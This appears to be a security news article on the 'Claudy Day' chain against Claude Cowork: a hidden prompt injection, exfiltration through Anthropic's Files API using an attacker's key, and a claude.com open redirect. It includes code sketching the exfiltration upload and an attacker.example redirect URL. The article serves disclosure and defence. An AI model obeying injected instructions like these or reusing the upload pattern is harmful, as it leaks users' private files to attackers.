Researchers Chain Prompt Injection and Files API Flaws to Silently Steal Claude User Data

A hidden prompt in an uploaded document silently triggered Claude to exfiltrate user files to an attacker's Anthropic account — a flaw Anthropic had dismissed five months earlier.

Tom Reznik · 4 min read
AI-generated illustration

Security researchers demonstrated how Anthropic's Claude Cowork productivity agent can be tricked into stealing user files and uploading them to an attacker's account, exploiting a vulnerability the company allegedly knew about but left unpatched for three months.

The trio of flaws includes an invisible prompt injection via URL parameters on Claude.ai, a data exfiltration channel through the Anthropic Files API, and an open redirect on claude.com. Researchers at Oasis Security discovered the flaws, which, when chained together in an attack dubbed "Claudy Day," "create a complete attack pipeline from targeted victim delivery to silent data exfiltration."

The attack chain starts when a user connects Cowork to a local folder containing sensitive information and uploads a document carrying a hidden prompt injection; the injected prompt triggers automatically when Cowork analyzes the files. Although Cowork's agent runs in a sandbox, that sandbox allows connections to api.anthropic.com, and Oasis found that Anthropic's Files API, a beta feature that lets developers upload files to storage tied to their API account, was reachable from inside it. An attacker who embeds their own API key in the hidden prompt can instruct Claude to pull data from the user's conversation history, write it to a file, and upload it to the attacker's Anthropic storage, then retrieve the file at their leisure.
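To make the exfiltration step concrete, here is a minimal sketch of the upload request a hidden prompt would have Claude issue from inside the sandbox. The endpoint and headers follow Anthropic's published Files API documentation; the API key, filename, and payload are placeholders, not values from the research.

```python
# Illustrative sketch only. The attacker's key, embedded in the injected
# prompt, determines whose account receives the uploaded file.
ATTACKER_API_KEY = "sk-ant-attacker-placeholder"

def build_exfil_upload(stolen_text: str) -> dict:
    """Describe the multipart POST that lands stolen data in the
    attacker's (not the victim's) Files API storage."""
    return {
        "url": "https://api.anthropic.com/v1/files",
        "headers": {
            # Whichever key signs the request decides which account's
            # storage receives the file -- the crux of the channel.
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            # Files API is a beta feature gated behind this header.
            "anthropic-beta": "files-api-2025-04-14",
        },
        # Multipart form field, e.g. for requests.post(..., files=...)
        "files": {"file": ("history.txt", stolen_text, "text/plain")},
    }

req = build_exfil_upload("copied conversation history ...")
```

Because the request goes to api.anthropic.com, a sandbox allow-list keyed on hostname alone cannot distinguish it from legitimate traffic.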

The open redirect rounded out the delivery chain. Oasis found an open redirect vulnerability on claude.com itself, meaning it could construct a URL that technically starts with the trusted claude.com domain but quietly drops the user at an attacker-controlled page with the hidden injection already baked in. Because Google Ads requires only that an ad's display URL match its destination's hostname, the researchers could build a Google Search advertisement that showed a legitimate claude.com address, passed Google's ad approval process, and delivered users straight to the injected URL.
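The hostname check the researchers sidestepped can be illustrated in a few lines. The redirect path and parameter name below are hypothetical; Oasis did not publish the exact URL.

```python
from urllib.parse import urlparse

# Hypothetical shape of the ad's destination URL; the real path and
# parameter on claude.com were not disclosed.
ad_destination = "https://claude.com/redirect?url=https://attacker.example/lure"

# A review step that compares only hostnames -- like Google Ads'
# display-URL rule -- sees the trusted domain, not the attacker page
# the server ultimately redirects to.
display_hostname = "claude.com"
destination_hostname = urlparse(ad_destination).hostname
ad_passes_review = destination_hostname == display_hostname
```

The redirect target lives in the query string, which a hostname-only comparison never inspects.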

Model choice offered no protection: neither Claude Haiku nor Anthropic's most capable model resisted the injection. PromptArmor researchers separately discovered that Claude's API struggles when a file does not match the type it claims to be: when operating on a malformed PDF that is actually a text file, Claude throws API errors in every subsequent chat in the conversation, a failure the researchers said could be exploited through indirect prompt injection to cause a limited denial of service. By January 15, PromptArmor had published a proof of concept demonstrating how attackers could steal files containing loan estimates, financial data, and partial Social Security numbers through the same Files API flaw.

What makes the disclosure timeline particularly pointed is that the architectural flaw at the chain's core was not new. Security researcher Johann Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025, and the company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability. Anthropic reversed course five days later, on October 30, reopening the ticket and confirming that "data exfiltration vulnerabilities such as this one are in-scope for reporting, and this issue should not have been closed as out-of-scope." Yet when Anthropic launched Cowork on January 13, nearly three months later, the Files API remained vulnerable, even as the company expanded the tool to a broader, less technical user base.

The technique allows exfiltration of up to 30MB per file, according to Anthropic's API documentation, with no limit on the number of files that can be uploaded. Oasis noted the attack requires no additional infrastructure: "Claudy Day" chains three independent flaws into an attack pipeline from targeted victim delivery to silent data theft without requiring any integrations, tools, or MCP server configurations, and operates entirely within a default, out-of-the-box Claude.ai session.

Oasis reported its findings through Anthropic's Responsible Disclosure Program before publication and said the prompt injection issue has been fixed, with remaining issues currently being addressed. Anthropic told reporters that Cowork was released as a research preview with "unique risks due to its agentic nature and internet access," and plans to ship an update to the Cowork virtual machine to improve its interaction with the vulnerable API.

PromptArmor's researchers stressed that the root problem is structural, not a matter of model sophistication: prompt injection exploits architectural weaknesses rather than gaps in model intelligence, so no amount of reasoning capability provides a defense. Cowork was designed to interact with a user's entire work environment, including browsers and Model Context Protocol servers that grant capabilities such as sending texts or controlling a Mac with AppleScript. Those functions increase the likelihood that the model will process sensitive and untrusted data the user never manually reviews, creating what PromptArmor describes as an ever-growing attack surface.
